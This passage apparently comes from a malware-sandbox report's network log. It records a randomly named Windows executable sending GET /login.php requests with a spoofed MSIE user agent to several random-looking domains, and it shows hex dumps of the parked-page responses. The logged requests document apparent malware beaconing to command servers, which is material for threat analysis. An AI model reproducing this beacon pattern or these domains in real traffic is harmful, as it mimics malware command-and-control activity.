                                                                                                                                                                                                                  Data Raw: 61 38 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: a8de<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410015106 CET1236INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                                  Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410031080 CET424INData Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20
                                                                                                                                                                                                                  Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410211086 CET1236INData Raw: 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 63 2e 70 75 73 68 28 61 5b 64 5d 29 7d 7d 7d 7d 7d 69 66 28 22 6c 61 6e 67 75 61 67 65 22 20 69 6e 20 6e 61 76 69 67 61 74 6f 72 29 7b 63 2e 70 75 73 68 28 6e 61 76 69 67 61 74 6f 72 2e 6c 61
                                                                                                                                                                                                                  Data Ascii: 0;d<a.length;d++){c.push(a[d])}}}}}if("language" in navigator){c.push(navigator.language)}if("userLanguage" in navigator){c.push(navigator.userLanguage)}var h="";for(var d=0;d<c.length;d++){var b=c[d].toUpperCase();if(g.indexOf(b)!=-1){h=b;bre
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410386086 CET1236INData Raw: 74 22 29 3b 6a 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 2d 61 62 22 2c 22 31 22 29 3b 76 61 72 20 63 3d 78 28 22 63 6d 70 64 65 73 69 67 6e 22 2c 22 63 6d 70 5f 64 65 73 69 67 6e 22 20 69 6e 20 68 3f 68 2e 63 6d 70 5f
                                                                                                                                                                                                                  Data Ascii: t");j.setAttribute("data-cmp-ab","1");var c=x("cmpdesign","cmp_design" in h?h.cmp_design:"");var f=x("cmpregulationkey","cmp_regulationkey" in h?h.cmp_regulationkey:"");var r=x("cmpgppkey","cmp_gppkey" in h?h.cmp_gppkey:"");var n=x("cmpatt","c
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410398960 CET1236INData Raw: 70 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 2c 22 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 20 69 6e 20 68 3f 68 2e 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 3a 22 22 29 3b 69 66 28 61 3d 3d 22 31 22 29 7b 6d 3d 22 69 6e 73
                                                                                                                                                                                                                  Data Ascii: pdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1")
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410409927 CET1236INData Raw: 67 28 30 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 29 3b 69 66 28 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 21 3d 2d 31 29 7b 76 61 72 20 63 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 69 6e
                                                                                                                                                                                                                  Data Ascii: g(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cm
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410423040 CET518INData Raw: 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 69 66 28 21 28 22 6c 61 73 74 49 64 22 20 69 6e 20 5f 5f 67 70 70 29 29 7b 5f 5f 67 70 70 2e 6c 61 73 74 49 64 3d 30 7d 5f 5f 67
                                                                                                                                                                                                                  Data Ascii: addEventListener"){__gpp.e=__gpp.e||[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410844088 CET1236INData Raw: 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b 30 5d 2c 67 70 70 53 74 72 69 6e 67 3a 22 22 2c 70 69 6e 67 44 61 74
                                                                                                                                                                                                                  Data Ascii: ectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.410856009 CET1236INData Raw: 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 2c 22 70 61 72 61 6d 65 74 65 72 22 20 69 6e 20 62 3f 62 2e 70 61 72 61 6d 65 74
                                                                                                                                                                                                                  Data Ascii: llId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(wi
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.414930105 CET1236INData Raw: 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69
                                                                                                                                                                                                                  Data Ascii: p_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://galyqaz.com/px.js?ch=1"></scrip


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  71192.168.2.65217091.195.240.19801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.335652113 CET271OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: www.gahyqah.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031400919 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:08 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:51:08 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-bsx5j
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031519890 CET1236INData Raw: 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c
                                                                                                                                                                                                                  Data Ascii: eneral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><linkAEC rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sed
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031533957 CET1236INData Raw: 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78
                                                                                                                                                                                                                  Data Ascii: {border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031969070 CET636INData Raw: 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e
                                                                                                                                                                                                                  Data Ascii: t-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031980991 CET1236INData Raw: 72 2d 73 65 61 72 63 68 62 6f 78 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73
                                                                                                                                                                                                                  Data Ascii: r-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbo
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.031991959 CET1236INData Raw: 68 0d 0a 35 37 36 0d 0a 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35
                                                                                                                                                                                                                  Data Ascii: h576:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032004118 CET1236INData Raw: 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63
                                                                                                                                                                                                                  Data Ascii: okie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-99AEC9}.btn{display:inline-block;border-style:solid;border-radius:5px;p
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032820940 CET1236INData Raw: 74 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 61 36 32 36 38 3b 2d 77 65 62 6b 69 74 2d 74
                                                                                                                                                                                                                  Data Ascii: te;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#5a6268;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transit
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032834053 CET639INData Raw: 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2d 2d 74 77 6f 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 2e 35 25 3b 68 65 69 67 68 74 3a 37 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68 69
                                                                                                                                                                                                                  Data Ascii: ent__container-ads--twot{margin-top:2.5%;height:700px}.container-content__webarchive{margin-top:4.5%}.container-content__header{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/a
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.032850981 CET1236INData Raw: 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 6c 70 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 37 32 30 70 78 7d 2e 63 6f 6e
                                                                                                                                                                                                                  Data Ascii: ;z-index:-1;top:50px;position:inherit}.container-content--lp{min-height:720px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-content--rp .container-content__left{background-position:0 40px}.
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.036621094 CET1236INData Raw: 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73
                                                                                                                                                                                                                  Data Ascii: er-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webarchive-block{text-a


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  72192.168.2.65217299.83.170.3801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.339626074 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.769769907 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Location: https://puzylyp.com/login.php
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:08 GMT
                                                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  73192.168.2.650217199.191.50.83806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068192005 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169269085 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Raw: 61 38 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: a8f4<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169282913 CET94INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                                  Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.c
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169296026 CET1236INData Raw: 6d 70 5f 63 64 69 64 3d 22 32 31 66 64 63 61 32 32 38 31 38 33 33 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 61 72 61 6d 73 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 61 72 61 6d 73 3d 22 22 7d 69 66 28 21 28 22 63
                                                                                                                                                                                                                  Data Ascii: mp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in windo
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169382095 CET1236INData Raw: 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3a 5b 5d 3b 69 66 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 66 2e 73 75 62 73 74 72 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c
                                                                                                                                                                                                                  Data Ascii: vigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.c
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169543028 CET424INData Raw: 78 4f 66 28 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 69 66 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66
